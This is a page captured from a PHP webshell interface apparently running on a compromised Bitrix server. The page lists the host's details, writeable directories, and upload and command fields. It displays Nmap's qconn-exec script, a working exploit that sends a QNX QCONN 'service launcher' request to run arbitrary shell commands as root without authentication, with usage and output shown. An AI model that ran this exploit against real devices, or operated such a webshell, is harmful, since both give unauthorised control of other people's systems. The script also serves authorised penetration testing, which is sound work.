403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/share/nmap/scripts/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : /usr/share/nmap/scripts/qconn-exec.nse
local comm = require("comm")
local vulns = require("vulns")
local stdnse = require("stdnse")
local string = require("string")
local shortport = require("shortport")

description = [[
Attempts to identify whether a listening QNX QCONN daemon allows
unauthenticated users to execute arbitrary operating system commands.

QNX is a commercial Unix-like real-time operating system, aimed primarily at
the embedded systems market. The QCONN daemon is a service provider that
provides support, such as profiling system information, to remote IDE
components. The QCONN daemon runs on port 8000 by default.

For more information about QNX QCONN, see:
* http://www.qnx.com/developers/docs/6.3.0SP3/neutrino/utilities/q/qconn.html
* http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
* http://www.exploit-db.com/exploits/21520
* http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
]]

---
-- @usage
-- nmap --script qconn-exec --script-args qconn-exec.timeout=60,qconn-exec.bytes=1024,qconn-exec.cmd="uname -a" -p <port> <target>
--
-- @output
-- PORT     STATE SERVICE VERSION
-- 8000/tcp open  qconn   qconn remote IDE support
-- | qconn-exec:
-- |   VULNERABLE:
-- |   The QNX QCONN daemon allows remote command execution.
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
-- |       system commands as the 'root' user.
-- |
-- |     References:
-- |       http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos
-- |_      http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec
--
-- @args qconn-exec.timeout
--                 Set the timeout in seconds. The default value is 30.
--
-- @args qconn-exec.bytes
--                 Set the number of bytes to retrieve. The default value is 1024.
--
-- @args qconn-exec.cmd
--                 Set the operating system command to execute. The default value is "uname -a".
--
-- @changelog
-- 2012-10-07 - Created - created by Brendan Coles - itsecuritysolutions.org
-- 2013-07-28 - Revised - allow users to specify arbitrary commands
--                      - now uses the vuln library for reporting

author = "Brendan Coles"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive", "exploit", "vuln"}

portrule = shortport.port_or_service ({8000}, "qconn", {"tcp"})

action = function( host, port )
  local vuln_table = {
    title = "The QNX QCONN daemon allows remote command execution.",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
The QNX QCONN daemon allows unauthenticated users to execute arbitrary operating
system commands as the 'root' user.
]],

    references = {
      'http://www.fishnetsecurity.com/6labs/blog/pentesting-qnx-neutrino-rtos',
      'http://metasploit.org/modules/exploit/unix/misc/qnx_qconn_exec'
    }
  }

  -- Set socket timeout
  local timeout = (stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 30)

  -- Set max bytes to retrieve
  local bytes = (stdnse.get_script_args(SCRIPT_NAME .. '.bytes') or 1024)

  -- Set command to execute
  local cmd = (stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "uname -a")

  -- Send command as service launcher request
  local req = string.format("service launcher\nstart/flags run /bin/sh /bin/sh -c \"%s\"\n", cmd)
  stdnse.debug1("Connecting to %s:%s", host.targetname or host.ip, port.number)
  local status, data = comm.exchange(host, port, req, {timeout=timeout*1000,bytes=bytes})
  if not status then
    stdnse.debug1("Timeout exceeded for %s:%s (Timeout: %ss).", host.targetname or host.ip, port.number, timeout)
    return
  end

  -- Parse response
  stdnse.debug2("Received reply:\n%s", data)
  if not string.match(data, "QCONN") then
    stdnse.debug1("%s:%s is not a QNX QCONN daemon.", host.targetname or host.ip, port.number)
    return
  end

  -- Check if the daemon attempted to execute the command
  if string.match(data, 'OK [0-9]+\r?\n') then
    vuln_table.state = vulns.STATE.VULN
    local report = vulns.Report:new(SCRIPT_NAME, host, port)
    return report:make_output(vuln_table)
  else
    stdnse.debug1("%s:%s QNX QCONN daemon is not vulnerable.", host.targetname or host.ip, port.number)
    return
  end

end

Youez - 2016 - github.com/yon3zu
LinuXploit